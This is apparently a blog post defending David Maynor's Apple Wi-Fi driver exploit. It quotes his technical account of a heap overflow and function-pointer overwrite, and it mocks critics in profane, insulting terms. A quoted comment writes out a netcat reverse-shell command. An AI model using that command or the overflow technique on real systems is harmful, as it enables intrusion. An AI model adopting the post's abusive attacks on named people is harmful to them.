Rixstep
 About | ACP | Buy | Industry Watch | Learning Curve | News | Products | Search | Substack
Home » Industry Watch

Hacker Finally Publishes Notorious Apple Wi-Fi Attack

It's no longer under NDA.


Get It

Try It

Over a year since first announcing a wireless hack into an Apple MacBook David Maynor finally publishes the story.

The details are found in the September issue of the Uninformed Journal.

Maynor's account takes you back to the point he accidentally came upon his discovery and how he went about (against all odds) isolating it and later refining it.

The discovery was made while performing fuzzing experiments on other machines. 'One of the MacBooks in the vicinity running OS X 10.4.6 crashed unexpectedly', Maynor writes.

Maynor then goes into great detail to explain the rest of the story. It makes great reading - like a suspense novel.

Under NDA

Why publish now? 'Because I can publish it now', Maynor told IDG's Robert McMillan and in the understatement of the century adds 'there's a lot of interesting information in the paper that if you're doing vulnerability research on Apple you'd find useful'.

Apple's Fault

Maynor makes it patently clear in his 'treatise' that the fault was indeed Apple's.

'The code found within the driver shows that although there is a length check in the open source driver, it's not actually present in the OS X binary driver.'

He also explains that the exploit requires a two stage overwrite.

'The result of this flaw is that many things beyond the Extended Rate buffer in the ieee80211_scan_entry structure are corrupted. In addition to crashing reliably on the same data, the size of the memcpy is two bytes wide meaning that up to 65535 bytes can be copied. Since the destination of the memcpy is a structure that ends with a function pointer, the hope is that enough data can be written outside of the destination buffer to the point where the function pointer is overwritten. In this way the next time the function pointer is called the caller would instead jump to whatever address is now stored in the function pointer.'

No NX Protection

'This is an important step as OS X claims to have NX protection that would prohibit certain memory regions from executing code. Executing a NOP sled then 0xcc will prove that protection technologies like NX do not affect execution in this situation.'

Bye Bye Miss American Pie

Maynor's been harping for years that security researchers were getting it all wrong and predicted two years ago that wireless hacks would be all the rage in two years. The reason? It's no longer 'a' computer - it's several all rolled into one. And hacking into a driver gives immediately root level access - bypassing the normal authentication and privilege escalation controls. Get in and control the crash and you own the machine.

'In other words, the Apple driver will copy five IEs from the original packet. One can cause an overflow in one of these elements, the Extended Rate IE, to overwrite structures that determine how the remaining four elements are copied. The copy of the RSN IE is chosen to make it possible to overwrite function pointers and store a first stage shellcode. The remaining three IEs, roughly 765 bytes in total, can be used to contain the real shellcode that does something useful, such as a connect-back shell, add a root user account, or play fun sounds on the speaker.'

The News Wasn't the News

But as per usual when Apple are involved - or can get themselves involved - the story wasn't so much the discovery of missing buffer check code in Apple's version of the open source driver as it was the typically hysterical fanboy reaction.

David Chartier, Glenn Fleishman, Jim Thompson, the Dalrymple™ - and of course every fanboy's fanboy John Gruber all got in the act, slung the mud and let the lies and hysteria cloud the issues. The 'Defenders of the Faith'. Even to this day irretrievably ignorant morons like Joshua Topolsky continue to hurl the shite.

It might be interesting to see what they said one year ago.

Fanboy Quotes - Then and Now

The problem here is that this experiment was not one of those quests for truth - it was a quest for, in the words of Mr Colbert: truthiness. We're genuinely sorry you're annoyed by the commercials, Mr Maynor (believe me: not everyone loves them) but that's why some genius some time ago invented the ability to change TV channels. Give that remote a whirl some time - it might make your life (and ours) a whole lot easier.
 - David Chartier

The Maynor video is complete fiction.
 - Jim Thompson

it's just useless bias from every partie and TUAW is at fault here promoting FEAR and stupid sensationalism
 - michel

But you are advocates of jumping on bandwagons and creating 'crisis 2.0s' where there are none. Just as I said in response to when Dan Laurie wrote that blog: Crisis 2.0 comes from self-important bloggers who have a chicken little, the sky is falling, mentality and don't have the acuity to read a situation correctly. Except for one writer, who I like a lot, this blog is successfully imploding on itself.
 - Wheels

You know, maybe TUAW could tell us whether or not there's a vulnerability, and how to plug it if so, and give up on this whole 'Well, we didn't like the guy and we thought he was a dick so technically that kind of makes him wrong' non-story.
 - Bob S

Um, am I not getting something out of this that Bob S. is? They were running the hack on third party hardware, with third party drivers. Why would you need a third party wireless card on a machine that has one built in? Here's your work around, get your computer fixed if the internal card dies! Are you even a Mac user, Bob? There's not a patch for the Macbook, because the problem is not with Apple hardware! And why would TUAW post the 'workaround' if the problem is with a non Apple product?
 - Fred

Oookay, calm down folks. Need I mention that this is a blog, and not a news site in any official capacity? If you don't like what's being posted, don't whine and moan, just go somewhere else. (Really, I shouldn't even have to tell you this.)
 - pseudoprometheus

Also, I don't know if you guys caught this, but it seemed to me like the user would have to actually connect to the ad-hoc network before the vulnerability could even take place. I'm sorry, but apple's software warns you before connecting to an ad-hoc network to begin with. So really, if it doesn't even work with Apple's wireless cards, and Apple warns you of the risks, then how is this a threat? Surely I can come up with hundreds of scenarios like this where if you connect to an ad-hoc network of someone's machine they could do whatever they want, take packet sniffing for example. Duh.
 - Thayne Miller

Watch the mainstream media sidestep this. They only want sensationalist journalism.
 - Jon

I put the blame for this debacle solely on the shoulders of Brian Krebs, the Washington Post blogger, and his editor who created the initial headline. Krebs used the sensational aspect of the story 'Apple's MacBook hacked' without asking the right questions or presenting this vulnerability as being entirely dependent on the use of a third-party wireless card using third-party drivers. It was immediately obvious upon watching the video that this hack required a specific situation that could be avoided by smart users. Rather than point out how users could avoid the flaw, Krebs and the Washington Post went for hits.
 - Paul Ingram

something strikes me funny about this ordeal... some people say don't blame tuaw because its a blog site and it not a news site... krebs posted this on a blog too (right?) so how can someone give a waiver just based on the type of site, but villify another?
 - ljbad4life

Were the authors of these articles too lazy to actually watch the video? The researchers don't say anything about it being the internal mac card. They clearly say that the exploit was shown with a third party card.
 - john

Sure, we watched the video, but did you read the articles? Brian states that the problem is with the internal hardware, making up excuses that Apple 'leaned' on them to prevent them from publicizing this, without providing a shred of evidence, or a name - nothing. They reassured us the flaw works on the internal hardware/software that comes on the MacBook, but have now finally admitted that was a blatant lie.
 - David Chartier

I guess I really must be missing the point here. Some guys said the Macbook had flaw, and that it could be easliy hacked. Then it comes out that it's really not that easy. THEN, it comes out that it's not so much that the Macbook is 'hackable' but that if you knowingly do something that is unsafe, someone could get into your machine? That's shocking!!!
 - Fred

Awesome. That's all I gotta say. Awesome. Airport rocks.
 - Paul

That smallworks description of the events that transpired was absolutely amazing. Dude took it apart like the Zapruder film and talked way over my head!
 - Joel Conrad Bechtolt

I think I just wasted too much of my time looking for something that isn't there. Any one else feeling a bit duped?
 - Gary Keen

David, your article is bull. This title of yours is despicable. Explain this lie in your title and your story David. It is bad enough you accuse them of falsification without proof, but it's absolutely disgusting you would accuse them of admitting to falsification. Did you even bother to read the word-for-word transcript I linked to in second to last paragraph? David did you even attend Black Hat or DEFCON? Did you ever contact Maynor? Did you even look at the original presentation let alone understand it? You're calling Maynor a liar because they're following responsible disclosure. You have no way to know if Apple leaned on them or not. You don't know what you're talking about here. All of the gory details will come out in the next few days, and you're going to look real foolish when it does.
 - George Ou

I don't think Maynor and Ellch have discovered such a vulnerability in the default MacBook AirPort card and driver, and so, if I'm right, they certainly won't accept this challenge. I think what they've discovered - if they've in fact discovered anything useful at all - is a class of potential Wi-Fi-based exploit, which they demonstrated on a rigged MacBook to generate publicity at the expense of the Mac's renowned reputation for security, but that they have not found an actual exploit based on this technique that works against the MacBook's built-in AirPort.
 - John Gruber

But They Were Right!

Brian Krebs, George Ou, HD Moore - but they were right! And what no one seems to grasp to this day is that David Maynor actually did demo the exploit live with an out of the box MacBook - before the Black Hat presentation. Some people just don't read and some people don't know how to listen. The switch was for the video clip only - the discovery was made on a MacBook 'as is'. Live. OOTB Apple computer. No USB stick. Not prerecorded. L-I-V-E.

But if Brian, George, and HD were all right - doesn't that make everyone else wrong?

Doesn't that make 'Charlie' the infamous 'Brian Krebs Watch' blogger who's defiled Brian's blog, vandalised his Wiki article, and tried to have him sacked sort of like a super twisted fuck?

Doesn't it make Jim Thompson who declared he could prove the demo was a fake sort of like awfully fucking stupid?

Doesn't it make the Dalrymple™, David Chartier, and John Gruber sort of like super nutter Lynn Fox fanboy pawns? Doesn't it force their readers to finally acknowledge they're irretrievably stupid and they're deliberately duping their readers?

Yes to all the above - unless you're a fanboy...

Postscript: The Toorcon Tussle

On 7 October 2006 Rixstep's Xnews published a record size account of the Maynor affair. It included choice fanboy quotes felled at the time by most of the dramatis personae cited above.

What's the secret of the fanboys? They're scared. Scared shitless. They don't see an exploit as something to fix - they see it as an attack on their cult. And being so pathologically scared, they learn to hate - and engage in an astounding level of hyperbole.

So much was obvious then - seeing it now in light of what's transpired makes for some very enjoyable reading.

I think Brian Krebs is lying about seeing an exploit run on the stock Airport drivers.
 - 'Charlie' at Brian Krebs Watch

Joining Krebs in line to flush his credibility and reputation down the journalistic toilet is ZDNet's George Ou.
 - John Gruber

No one who has actually watched their video is disputing that the exploit demonstrated by Maynor and Ellch in the video of a MacBook equipped with a third-party USB wireless card.
 - John Gruber (Note sentence is grammatically incorrect.)

That this sort of basic middle school level logic should need to be painstakingly spelled out for the computer security columnist for the Washington Post is astounding.
 - John Gruber

I thus see no way out of this where Maynor and Ellch escape with their reputations intact, other than if they have in fact discovered a vulnerability against the stock MacBook card and driver, that they have disclosed their findings privately to Apple, and that the statement issued Friday by Apple's Lynn Fox is in fact scurrilously false. But even in this scenario - which as I see it is the best case for Maynor and Ellch - if they know for certain that MacBooks, as shipped by Apple, are vulnerable, why have they not plainly said so? I'm not saying they should have publicly described the nature of the vulnerability in any detail, but they certainly should have stated clearly that owners of whatever specific Macintoshes they have identified flaws against should be careful when turning on AirPort in any public or non-trusted environment.
 - John Gruber

In short, either Maynor and Ellch have discovered an exploit against a stock MacBook and Apple has decided, incomprehensibly, to scurrilously besmirch their reputations with flat-out lies that will soon be disproved and will bring disgrace to Apple Computer, or, Maynor and Ellch have not discovered such an exploit and they are, at best, gross exaggerators, or, at worst (and more likely in my opinion), outright frauds.
 - John Gruber

It is becoming more and more clear that the reporting Krebs 'stands by' is false.
 - John Gruber

So at the beginning of August, Maynor and Ellch told Krebs that the default MacBook drivers were exploitable, but would not, even on video, demonstrate an exploit against them publicly. As of last Thursday, however, their SecureWorks web site explicitly states that their video demonstration does not involve Apple's default drivers, and both Apple and Atheros issued unequivocal statements that Maynor and Ellch have not provided Apple with any evidence showing a flaw in Apple's drivers.
 - John Gruber

Brian Krebs has dugg himself a mighty deep hole.
 - John Gruber

George Ou is going down with the ship.
 - John Gruber

Something stinks. Maynor explicity states that he isn't using the internal Apple Airport card, but this is the card with the IP address.
 - Jim Thompson

Rather than come out and state 'the Airport card is not vulnerable', they decided that they must have enough sizzle in their story to get noticed. It just wasn't going to get anyone's notice if they showed their little hack on Windows. Everyone knows that Windows is swiss cheese by now.
 - Jim Thompson

What makes this little factoid interesting is that there was a bug in the Information Element (IE) handling in the freebsd-6.0 Atheros driver that probably clued Maynor and Ellch into the possibilities.
 - Jim Thompson

In what must now be viewed as a desperate attempt to drum up business for their Maynor's firm, the pair implies they went and found a USB device with a driver for MacOS that would forward unsolicited probe response frames, and then, via methods they are too shy (or embarassed) to explain, attached same to a 'reverse shell' process on the Macbook. Frankly, from what we're show, its possible that all Maynor does is type nc -e '/bin/sh' 192.168.1.1 port-num, and then simply clears the screen. The version of nc that comes with MacOS doesn't support the '-e' switch, but it would be easy to compile in and replace the stock nc binary.
 - Jim Thompson

The last two newsletters have been too funny. I have had some fanboy experience myself, having been a hardware and software developer for Amiga computers at Applied Magic back in the late 90s during the Commodore meltdown. I have to say that even the most rabid Video Toaster equipped Amiga fanboy doesn't hold a candle to the ones generated by Apple. Keep it up, this makes for some fun reading.
 - Xnews reader

About | ACP | Buy | Industry Watch | Learning Curve | News | Products | Search | Substack
Copyright © Rixstep. All rights reserved.